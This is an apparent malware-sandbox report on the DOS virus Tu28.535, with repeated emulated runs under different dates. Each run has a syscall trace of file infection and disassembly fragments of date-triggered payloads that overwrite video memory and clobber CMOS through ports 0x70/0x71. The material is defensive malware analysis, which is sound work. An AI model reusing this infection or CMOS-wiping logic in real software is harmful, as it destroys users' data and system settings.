Sample viewer

vx.netlux.org/Virus.DOS.Tu28.535

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:51:22.356938844Z 25 PC: 12e17 | Get default drive
2018-12-17T22:51:22.358508523Z 26 PC: 12e34 | Set disk transfer address
2018-12-17T22:51:22.359697194Z 78 PC: 12e47 | Find first file
2018-12-17T22:51:22.367016225Z 67 PC: 12f37 | Get or set file attributes
2018-12-17T22:51:22.385250928Z 61 PC: 12f45 | Open file (Filename = 'A^��I< u���&�e�&���nt/�>�t���')
2018-12-17T22:51:22.392500691Z 63 PC: 12f55 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:51:22.399329654Z 66 PC: 12f5e | Move file pointer
2018-12-17T22:51:22.400901529Z 64 PC: 12f6a | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:51:22.403793161Z 66 PC: 12f73 | Move file pointer
2018-12-17T22:51:22.405059634Z 64 PC: 12f7f | Write file or device (Write 532 bytes on handle 5)
2018-12-17T22:51:22.413498929Z 66 PC: 12f88 | Move file pointer
2018-12-17T22:51:22.415033714Z 64 PC: 12f94 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:51:22.417656951Z 67 PC: 12f9f | Get or set file attributes
2018-12-17T22:51:22.42866288Z 87 PC: 12fa4 | Get or set file date and time
2018-12-17T22:51:22.431304886Z 87 PC: 12fae | Get or set file date and time
2018-12-17T22:51:22.433875282Z 62 PC: 12fb2 | Close file
2018-12-17T22:51:22.489565028Z 42 PC: 12fc7 | Get date
0x12fc7: cmp dx, 0x21c
0x12fcb: jne 0x12fd6
0x12fcd: mov ah, 0x2c
0x12fcf: int 0x21
0x12fd1: cmp ch, 0x17
0x12fd4: je 0x12fdf
0x12fd6: mov ax, ds
0x12fd8: mov es, ax
0x12fda: mov ax, 0x100
0x12fdd: jmp ax
0x12fdf: mov cx, 0x7e8
0x12fe2: push ds
0x12fe3: mov ax, 0xb000
0x12fe6: mov ds, ax
0x12fe8: xor di, di
0x12fea: mov word ptr [di], 0x8f00
0x12fee: inc di
0x12fef: inc di
0x12ff0: loop 0x12fea
0x12ff2: pop ds
2018-12-17T22:51:22.493035475Z 250 PC: 12c21 | UNKNOWN!
2018-12-17T22:51:22.493906914Z 144 PC: 12c2c | UNKNOWN!
2018-12-17T22:51:22.494732731Z 53 PC: 12c3a | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:51:22.496128184Z 74 PC: 12c5a | Reallocate memory
2018-12-17T22:51:22.497806813Z 72 PC: 12c61 | Allocate memory
2018-12-17T22:51:22.49945523Z 37 PC: 12c87 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:51:22.500691098Z 42 PC: 12a6a | Get date
0x12a6a: cmp dx, 0x112
0x12a6e: je 0x12a71
0x12a70: ret
0x12a71: mov cx, 0x3f
0x12a74: mov al, cl
0x12a76: out 0x70, al
0x12a78: jmp 0x12a7b
0x12a7b: out 0x71, al
0x12a7d: loop 0x12a74
0x12a7f: ret
0x12a80: pushf
0x12a81: push ax
0x12a82: push bx
0x12a83: push cx
0x12a84: push dx
0x12a85: push ds
0x12a86: push di
0x12a87: mov bx, ax
0x12a89: cmp bx, 0x4b00
0x12a8d: je 0x12ad1

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10531,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:28:16.844314433Z 25 PC: 12e17 | Get default drive
2018-12-25T12:28:16.846485074Z 26 PC: 12e34 | Set disk transfer address
2018-12-25T12:28:16.849043952Z 78 PC: 12e47 | Find first file
2018-12-25T12:28:16.856338674Z 67 PC: 12f37 | Get or set file attributes
2018-12-25T12:28:16.873766351Z 61 PC: 12f45 | Open file (Filename = 'A^��I< u���&�e�&���nt/�>�t���')
2018-12-25T12:28:16.882283079Z 63 PC: 12f55 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:28:16.892478485Z 66 PC: 12f5e | Move file pointer
2018-12-25T12:28:16.894532786Z 64 PC: 12f6a | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:28:16.899438375Z 66 PC: 12f73 | Move file pointer
2018-12-25T12:28:16.902488904Z 64 PC: 12f7f | Write file or device (Write 532 bytes on handle 5)
2018-12-25T12:28:16.91436269Z 66 PC: 12f88 | Move file pointer
2018-12-25T12:28:16.916855243Z 64 PC: 12f94 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:28:16.919818902Z 67 PC: 12f9f | Get or set file attributes
2018-12-25T12:28:16.933408636Z 87 PC: 12fa4 | Get or set file date and time
2018-12-25T12:28:16.935415157Z 87 PC: 12fae | Get or set file date and time
2018-12-25T12:28:16.937892885Z 62 PC: 12fb2 | Close file
2018-12-25T12:28:16.948173875Z 42 PC: 12fc7 | Get date
0x12fc7: cmp dx, 0x21c
0x12fcb: jne 0x12fd6
0x12fcd: mov ah, 0x2c
0x12fcf: int 0x21
0x12fd1: cmp ch, 0x17
0x12fd4: je 0x12fdf
0x12fd6: mov ax, ds
0x12fd8: mov es, ax
0x12fda: mov ax, 0x100
0x12fdd: jmp ax
0x12fdf: mov cx, 0x7e8
0x12fe2: push ds
0x12fe3: mov ax, 0xb000
0x12fe6: mov ds, ax
0x12fe8: xor di, di
0x12fea: mov word ptr [di], 0x8f00
0x12fee: inc di
0x12fef: inc di
0x12ff0: loop 0x12fea
0x12ff2: pop ds
2018-12-25T12:28:16.951026795Z 250 PC: 12c21 | UNKNOWN!
2018-12-25T12:28:16.952793054Z 144 PC: 12c2c | UNKNOWN!
2018-12-25T12:28:16.953737743Z 53 PC: 12c3a | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:28:16.955128182Z 74 PC: 12c5a | Reallocate memory
2018-12-25T12:28:16.957102587Z 72 PC: 12c61 | Allocate memory
2018-12-25T12:28:16.959482529Z 37 PC: 12c87 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:28:16.961205334Z 42 PC: 12a6a | Get date
0x12a6a: cmp dx, 0x112
0x12a6e: je 0x12a71
0x12a70: ret
0x12a71: mov cx, 0x3f
0x12a74: mov al, cl
0x12a76: out 0x70, al
0x12a78: jmp 0x12a7b
0x12a7b: out 0x71, al
0x12a7d: loop 0x12a74
0x12a7f: ret
0x12a80: pushf
0x12a81: push ax
0x12a82: push bx
0x12a83: push cx
0x12a84: push dx
0x12a85: push ds
0x12a86: push di
0x12a87: mov bx, ax
0x12a89: cmp bx, 0x4b00
0x12a8d: je 0x12ad1

{"DateBased":true,"Day":28,"Month":2,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10531,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:28:16.856846463Z 25 PC: 12e17 | Get default drive
2018-12-25T12:28:16.858527088Z 26 PC: 12e34 | Set disk transfer address
2018-12-25T12:28:16.859761209Z 78 PC: 12e47 | Find first file
2018-12-25T12:28:16.866558369Z 67 PC: 12f37 | Get or set file attributes
2018-12-25T12:28:16.88830564Z 61 PC: 12f45 | Open file (Filename = 'A^��I< u���&�e�&���nt/�>�t���')
2018-12-25T12:28:16.89610052Z 63 PC: 12f55 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:28:16.903792472Z 66 PC: 12f5e | Move file pointer
2018-12-25T12:28:16.905523837Z 64 PC: 12f6a | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:28:16.912680864Z 66 PC: 12f73 | Move file pointer
2018-12-25T12:28:16.914545336Z 64 PC: 12f7f | Write file or device (Write 532 bytes on handle 5)
2018-12-25T12:28:16.923697886Z 66 PC: 12f88 | Move file pointer
2018-12-25T12:28:16.926979837Z 64 PC: 12f94 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:28:16.930215933Z 67 PC: 12f9f | Get or set file attributes
2018-12-25T12:28:16.942507112Z 87 PC: 12fa4 | Get or set file date and time
2018-12-25T12:28:16.944643301Z 87 PC: 12fae | Get or set file date and time
2018-12-25T12:28:16.94666204Z 62 PC: 12fb2 | Close file
2018-12-25T12:28:16.955280666Z 42 PC: 12fc7 | Get date
0x12fc7: cmp dx, 0x21c
0x12fcb: jne 0x12fd6
0x12fcd: mov ah, 0x2c
0x12fcf: int 0x21
0x12fd1: cmp ch, 0x17
0x12fd4: je 0x12fdf
0x12fd6: mov ax, ds
0x12fd8: mov es, ax
0x12fda: mov ax, 0x100
0x12fdd: jmp ax
0x12fdf: mov cx, 0x7e8
0x12fe2: push ds
0x12fe3: mov ax, 0xb000
0x12fe6: mov ds, ax
0x12fe8: xor di, di
0x12fea: mov word ptr [di], 0x8f00
0x12fee: inc di
0x12fef: inc di
0x12ff0: loop 0x12fea
0x12ff2: pop ds
2018-12-25T12:28:16.980207439Z 44 PC: 12fd1 | Get time
0x12fd1: cmp ch, 0x17
0x12fd4: je 0x12fdf
0x12fd6: mov ax, ds
0x12fd8: mov es, ax
0x12fda: mov ax, 0x100
0x12fdd: jmp ax
0x12fdf: mov cx, 0x7e8
0x12fe2: push ds
0x12fe3: mov ax, 0xb000
0x12fe6: mov ds, ax
0x12fe8: xor di, di
0x12fea: mov word ptr [di], 0x8f00
0x12fee: inc di
0x12fef: inc di
0x12ff0: loop 0x12fea
0x12ff2: pop ds
0x12ff3: mov cx, 0x11
0x12ff6: mov bx, es
0x12ff8: add bx, 0x1ff
0x12ffc: push bx
2018-12-25T12:28:16.982771825Z 250 PC: 12c21 | UNKNOWN!
2018-12-25T12:28:16.984138524Z 144 PC: 12c2c | UNKNOWN!
2018-12-25T12:28:16.9855603Z 53 PC: 12c3a | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:28:16.986771696Z 74 PC: 12c5a | Reallocate memory
2018-12-25T12:28:16.988132153Z 72 PC: 12c61 | Allocate memory
2018-12-25T12:28:16.989918939Z 37 PC: 12c87 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:28:16.991201341Z 42 PC: 12a6a | Get date
0x12a6a: cmp dx, 0x112
0x12a6e: je 0x12a71
0x12a70: ret
0x12a71: mov cx, 0x3f
0x12a74: mov al, cl
0x12a76: out 0x70, al
0x12a78: jmp 0x12a7b
0x12a7b: out 0x71, al
0x12a7d: loop 0x12a74
0x12a7f: ret
0x12a80: pushf
0x12a81: push ax
0x12a82: push bx
0x12a83: push cx
0x12a84: push dx
0x12a85: push ds
0x12a86: push di
0x12a87: mov bx, ax
0x12a89: cmp bx, 0x4b00
0x12a8d: je 0x12ad1

{"DateBased":true,"Day":18,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10531,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:28:17.419531666Z 25 PC: 12e17 | Get default drive
2018-12-25T12:28:17.421214842Z 26 PC: 12e34 | Set disk transfer address
2018-12-25T12:28:17.423510432Z 78 PC: 12e47 | Find first file
2018-12-25T12:28:17.438140869Z 67 PC: 12f37 | Get or set file attributes
2018-12-25T12:28:17.455507175Z 61 PC: 12f45 | Open file (Filename = 'A^��I< u���&�e�&���nt/�>�t���')
2018-12-25T12:28:17.47411322Z 63 PC: 12f55 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:28:17.481782993Z 66 PC: 12f5e | Move file pointer
2018-12-25T12:28:17.483829862Z 64 PC: 12f6a | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:28:17.488698879Z 66 PC: 12f73 | Move file pointer
2018-12-25T12:28:17.492566554Z 64 PC: 12f7f | Write file or device (Write 532 bytes on handle 5)
2018-12-25T12:28:17.501901112Z 66 PC: 12f88 | Move file pointer
2018-12-25T12:28:17.505951861Z 64 PC: 12f94 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:28:17.509922584Z 67 PC: 12f9f | Get or set file attributes
2018-12-25T12:28:17.523384672Z 87 PC: 12fa4 | Get or set file date and time
2018-12-25T12:28:17.525301375Z 87 PC: 12fae | Get or set file date and time
2018-12-25T12:28:17.528605833Z 62 PC: 12fb2 | Close file
2018-12-25T12:28:17.537681698Z 42 PC: 12fc7 | Get date
0x12fc7: cmp dx, 0x21c
0x12fcb: jne 0x12fd6
0x12fcd: mov ah, 0x2c
0x12fcf: int 0x21
0x12fd1: cmp ch, 0x17
0x12fd4: je 0x12fdf
0x12fd6: mov ax, ds
0x12fd8: mov es, ax
0x12fda: mov ax, 0x100
0x12fdd: jmp ax
0x12fdf: mov cx, 0x7e8
0x12fe2: push ds
0x12fe3: mov ax, 0xb000
0x12fe6: mov ds, ax
0x12fe8: xor di, di
0x12fea: mov word ptr [di], 0x8f00
0x12fee: inc di
0x12fef: inc di
0x12ff0: loop 0x12fea
0x12ff2: pop ds
2018-12-25T12:28:17.544412797Z 250 PC: 12c21 | UNKNOWN!
2018-12-25T12:28:17.546662012Z 144 PC: 12c2c | UNKNOWN!
2018-12-25T12:28:17.547635374Z 53 PC: 12c3a | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:28:17.549033521Z 74 PC: 12c5a | Reallocate memory
2018-12-25T12:28:17.552042978Z 72 PC: 12c61 | Allocate memory
2018-12-25T12:28:17.553942954Z 37 PC: 12c87 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:28:17.556396905Z 42 PC: 12a6a | Get date
0x12a6a: cmp dx, 0x112
0x12a6e: je 0x12a71
0x12a70: ret
0x12a71: mov cx, 0x3f
0x12a74: mov al, cl
0x12a76: out 0x70, al
0x12a78: jmp 0x12a7b
0x12a7b: out 0x71, al
0x12a7d: loop 0x12a74
0x12a7f: ret
0x12a80: pushf
0x12a81: push ax
0x12a82: push bx
0x12a83: push cx
0x12a84: push dx
0x12a85: push ds
0x12a86: push di
0x12a87: mov bx, ax
0x12a89: cmp bx, 0x4b00
0x12a8d: je 0x12ad1

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10531,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:28:17.670993976Z 25 PC: 12e17 | Get default drive
2018-12-25T12:28:17.672886459Z 26 PC: 12e34 | Set disk transfer address
2018-12-25T12:28:17.675297621Z 78 PC: 12e47 | Find first file
2018-12-25T12:28:17.682505704Z 67 PC: 12f37 | Get or set file attributes
2018-12-25T12:28:17.699503317Z 61 PC: 12f45 | Open file (Filename = 'A^��I< u���&�e�&���nt/�>�t���')
2018-12-25T12:28:17.70863234Z 63 PC: 12f55 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:28:17.715971622Z 66 PC: 12f5e | Move file pointer
2018-12-25T12:28:17.717505683Z 64 PC: 12f6a | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:28:17.721189799Z 66 PC: 12f73 | Move file pointer
2018-12-25T12:28:17.723760189Z 64 PC: 12f7f | Write file or device (Write 532 bytes on handle 5)
2018-12-25T12:28:17.733429052Z 66 PC: 12f88 | Move file pointer
2018-12-25T12:28:17.735828421Z 64 PC: 12f94 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:28:17.740033141Z 67 PC: 12f9f | Get or set file attributes
2018-12-25T12:28:17.752408951Z 87 PC: 12fa4 | Get or set file date and time
2018-12-25T12:28:17.754277921Z 87 PC: 12fae | Get or set file date and time
2018-12-25T12:28:17.757132518Z 62 PC: 12fb2 | Close file
2018-12-25T12:28:17.765542115Z 42 PC: 12fc7 | Get date
0x12fc7: cmp dx, 0x21c
0x12fcb: jne 0x12fd6
0x12fcd: mov ah, 0x2c
0x12fcf: int 0x21
0x12fd1: cmp ch, 0x17
0x12fd4: je 0x12fdf
0x12fd6: mov ax, ds
0x12fd8: mov es, ax
0x12fda: mov ax, 0x100
0x12fdd: jmp ax
0x12fdf: mov cx, 0x7e8
0x12fe2: push ds
0x12fe3: mov ax, 0xb000
0x12fe6: mov ds, ax
0x12fe8: xor di, di
0x12fea: mov word ptr [di], 0x8f00
0x12fee: inc di
0x12fef: inc di
0x12ff0: loop 0x12fea
0x12ff2: pop ds
2018-12-25T12:28:17.768496651Z 250 PC: 12c21 | UNKNOWN!
2018-12-25T12:28:17.770035389Z 144 PC: 12c2c | UNKNOWN!
2018-12-25T12:28:17.770960277Z 53 PC: 12c3a | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:28:17.77243517Z 74 PC: 12c5a | Reallocate memory
2018-12-25T12:28:17.774845233Z 72 PC: 12c61 | Allocate memory
2018-12-25T12:28:17.777604525Z 37 PC: 12c87 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:28:17.779412217Z 42 PC: 12a6a | Get date
0x12a6a: cmp dx, 0x112
0x12a6e: je 0x12a71
0x12a70: ret
0x12a71: mov cx, 0x3f
0x12a74: mov al, cl
0x12a76: out 0x70, al
0x12a78: jmp 0x12a7b
0x12a7b: out 0x71, al
0x12a7d: loop 0x12a74
0x12a7f: ret
0x12a80: pushf
0x12a81: push ax
0x12a82: push bx
0x12a83: push cx
0x12a84: push dx
0x12a85: push ds
0x12a86: push di
0x12a87: mov bx, ax
0x12a89: cmp bx, 0x4b00
0x12a8d: je 0x12ad1

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10531,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:28:17.878570489Z 25 PC: 12e17 | Get default drive
2018-12-25T12:28:17.880407423Z 26 PC: 12e34 | Set disk transfer address
2018-12-25T12:28:17.881774532Z 78 PC: 12e47 | Find first file
2018-12-25T12:28:17.888035748Z 67 PC: 12f37 | Get or set file attributes
2018-12-25T12:28:17.904319883Z 61 PC: 12f45 | Open file (Filename = 'A^��I< u���&�e�&���nt/�>�t���')
2018-12-25T12:28:17.910906371Z 63 PC: 12f55 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:28:17.917062568Z 66 PC: 12f5e | Move file pointer
2018-12-25T12:28:17.918746409Z 64 PC: 12f6a | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:28:17.922000286Z 66 PC: 12f73 | Move file pointer
2018-12-25T12:28:17.923340189Z 64 PC: 12f7f | Write file or device (Write 532 bytes on handle 5)
2018-12-25T12:28:17.931088153Z 66 PC: 12f88 | Move file pointer
2018-12-25T12:28:17.933498077Z 64 PC: 12f94 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:28:17.936070156Z 67 PC: 12f9f | Get or set file attributes
2018-12-25T12:28:17.946537687Z 87 PC: 12fa4 | Get or set file date and time
2018-12-25T12:28:17.948924928Z 87 PC: 12fae | Get or set file date and time
2018-12-25T12:28:17.950362486Z 62 PC: 12fb2 | Close file
2018-12-25T12:28:17.957176931Z 42 PC: 12fc7 | Get date
0x12fc7: cmp dx, 0x21c
0x12fcb: jne 0x12fd6
0x12fcd: mov ah, 0x2c
0x12fcf: int 0x21
0x12fd1: cmp ch, 0x17
0x12fd4: je 0x12fdf
0x12fd6: mov ax, ds
0x12fd8: mov es, ax
0x12fda: mov ax, 0x100
0x12fdd: jmp ax
0x12fdf: mov cx, 0x7e8
0x12fe2: push ds
0x12fe3: mov ax, 0xb000
0x12fe6: mov ds, ax
0x12fe8: xor di, di
0x12fea: mov word ptr [di], 0x8f00
0x12fee: inc di
0x12fef: inc di
0x12ff0: loop 0x12fea
0x12ff2: pop ds
2018-12-25T12:28:17.962627514Z 250 PC: 12c21 | UNKNOWN!
2018-12-25T12:28:17.96349178Z 144 PC: 12c2c | UNKNOWN!
2018-12-25T12:28:17.964349585Z 53 PC: 12c3a | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:28:17.967981756Z 74 PC: 12c5a | Reallocate memory
2018-12-25T12:28:17.969346495Z 72 PC: 12c61 | Allocate memory
2018-12-25T12:28:17.97087879Z 37 PC: 12c87 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:28:17.972575067Z 42 PC: 12a6a | Get date
0x12a6a: cmp dx, 0x112
0x12a6e: je 0x12a71
0x12a70: ret
0x12a71: mov cx, 0x3f
0x12a74: mov al, cl
0x12a76: out 0x70, al
0x12a78: jmp 0x12a7b
0x12a7b: out 0x71, al
0x12a7d: loop 0x12a74
0x12a7f: ret
0x12a80: pushf
0x12a81: push ax
0x12a82: push bx
0x12a83: push cx
0x12a84: push dx
0x12a85: push ds
0x12a86: push di
0x12a87: mov bx, ax
0x12a89: cmp bx, 0x4b00
0x12a8d: je 0x12ad1

{"DateBased":true,"Day":18,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10531,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:28:18.196538978Z 25 PC: 12e17 | Get default drive
2018-12-25T12:28:18.1981724Z 26 PC: 12e34 | Set disk transfer address
2018-12-25T12:28:18.199179208Z 78 PC: 12e47 | Find first file
2018-12-25T12:28:18.202986448Z 67 PC: 12f37 | Get or set file attributes
2018-12-25T12:28:18.215969422Z 61 PC: 12f45 | Open file (Filename = 'A^��I< u���&�e�&���nt/�>�t���')
2018-12-25T12:28:18.22336922Z 63 PC: 12f55 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:28:18.227922856Z 66 PC: 12f5e | Move file pointer
2018-12-25T12:28:18.229825622Z 64 PC: 12f6a | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:28:18.233343229Z 66 PC: 12f73 | Move file pointer
2018-12-25T12:28:18.235134352Z 64 PC: 12f7f | Write file or device (Write 532 bytes on handle 5)
2018-12-25T12:28:18.243461058Z 66 PC: 12f88 | Move file pointer
2018-12-25T12:28:18.245564267Z 64 PC: 12f94 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:28:18.248520262Z 67 PC: 12f9f | Get or set file attributes
2018-12-25T12:28:18.259136233Z 87 PC: 12fa4 | Get or set file date and time
2018-12-25T12:28:18.262039904Z 87 PC: 12fae | Get or set file date and time
2018-12-25T12:28:18.263812594Z 62 PC: 12fb2 | Close file
2018-12-25T12:28:18.270809431Z 42 PC: 12fc7 | Get date
0x12fc7: cmp dx, 0x21c
0x12fcb: jne 0x12fd6
0x12fcd: mov ah, 0x2c
0x12fcf: int 0x21
0x12fd1: cmp ch, 0x17
0x12fd4: je 0x12fdf
0x12fd6: mov ax, ds
0x12fd8: mov es, ax
0x12fda: mov ax, 0x100
0x12fdd: jmp ax
0x12fdf: mov cx, 0x7e8
0x12fe2: push ds
0x12fe3: mov ax, 0xb000
0x12fe6: mov ds, ax
0x12fe8: xor di, di
0x12fea: mov word ptr [di], 0x8f00
0x12fee: inc di
0x12fef: inc di
0x12ff0: loop 0x12fea
0x12ff2: pop ds
2018-12-25T12:28:18.274215385Z 250 PC: 12c21 | UNKNOWN!
2018-12-25T12:28:18.275158393Z 144 PC: 12c2c | UNKNOWN!
2018-12-25T12:28:18.275970406Z 53 PC: 12c3a | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:28:18.277737683Z 74 PC: 12c5a | Reallocate memory
2018-12-25T12:28:18.279075949Z 72 PC: 12c61 | Allocate memory
2018-12-25T12:28:18.280528176Z 37 PC: 12c87 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:28:18.283160785Z 42 PC: 12a6a | Get date
0x12a6a: cmp dx, 0x112
0x12a6e: je 0x12a71
0x12a70: ret
0x12a71: mov cx, 0x3f
0x12a74: mov al, cl
0x12a76: out 0x70, al
0x12a78: jmp 0x12a7b
0x12a7b: out 0x71, al
0x12a7d: loop 0x12a74
0x12a7f: ret
0x12a80: pushf
0x12a81: push ax
0x12a82: push bx
0x12a83: push cx
0x12a84: push dx
0x12a85: push ds
0x12a86: push di
0x12a87: mov bx, ax
0x12a89: cmp bx, 0x4b00
0x12a8d: je 0x12ad1